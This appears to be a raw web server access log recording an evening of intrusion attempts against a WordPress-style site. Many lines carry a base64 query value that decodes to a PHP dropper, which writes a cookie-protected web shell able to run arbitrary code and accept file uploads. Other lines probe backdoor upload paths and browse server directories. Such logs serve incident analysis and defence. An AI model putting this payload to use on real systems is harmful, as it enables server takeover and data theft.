37.52.186.2 - - [07/Nov/2025:19:49:28 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
37.52.186.2 - - [07/Nov/2025:20:06:41 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.23 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:20:22:44 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0"
106.75.50.6 - - [07/Nov/2025:20:26:13 +0000] "GET /favicon.ico HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
106.75.50.6 - - [07/Nov/2025:20:26:14 +0000] "GET /sitemap.xml HTTP/1.1" 404 1251 "-" "Go-http-client/1.1"
37.52.186.2 - - [07/Nov/2025:20:38:01 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2651.89 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:20:38:02 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2651.89 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:20:54:31 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:21:10:03 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.34 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:21:10:06 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.34 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:20:54:32 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:20:54:38 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:21:09:58 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.34 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:21:09:59 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.34 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:21:25:22 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
194.68.32.71 - - [07/Nov/2025:21:25:22 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
37.52.186.2 - - [07/Nov/2025:21:58:15 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2821.40 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:19:49:26 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
43.153.62.161 - - [07/Nov/2025:19:50:09 +0000] "GET /68fe4/?path=//lib64 HTTP/1.1" 200 44779 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.156.228.27 - - [07/Nov/2025:19:57:10 +0000] "GET /68fe4/?path=//tmp HTTP/1.1" 200 1020 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
37.52.186.2 - - [07/Nov/2025:20:06:19 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.23 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:20:06:19 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.23 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:20:06:19 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.23 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:20:06:46 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.23 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:20:54:31 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:21:10:03 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.34 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:21:25:15 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
194.68.32.71 - - [07/Nov/2025:21:25:16 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
37.52.186.2 - - [07/Nov/2025:22:13:29 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:21:10:07 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2755.34 Safari/537.36"
194.68.32.71 - - [07/Nov/2025:21:25:11 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
194.68.32.71 - - [07/Nov/2025:21:25:15 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
194.68.32.71 - - [07/Nov/2025:21:40:21 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:49.0) Gecko/20100101 Firefox/49.0"
37.52.186.2 - - [07/Nov/2025:21:57:54 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2821.40 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:21:58:17 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2821.40 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:21:58:18 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2821.40 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:22:13:27 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:22:13:28 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:22:13:28 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:22:13:30 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:22:13:30 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"
37.52.186.2 - - [07/Nov/2025:22:28:44 +0000] "GET / HTTP/1.1" 200 1666 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2937.90 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:22:28:46 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2937.90 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:21:58:16 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2821.40 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:21:58:17 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2821.40 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:22:28:47 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/mah.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2937.90 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:22:28:48 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://metalescrose.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2937.90 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:22:28:48 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://metalescrose.com/goods.php?upload" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2937.90 Safari/537.36"
37.52.186.2 - - [07/Nov/2025:22:28:49 +0000] "GET /c41846c1ce68.php HTTP/1.1" 404 1251 "http://metalescrose.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2M0MTg0NmMxY2U2OC5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2937.90 Safari/537.36"
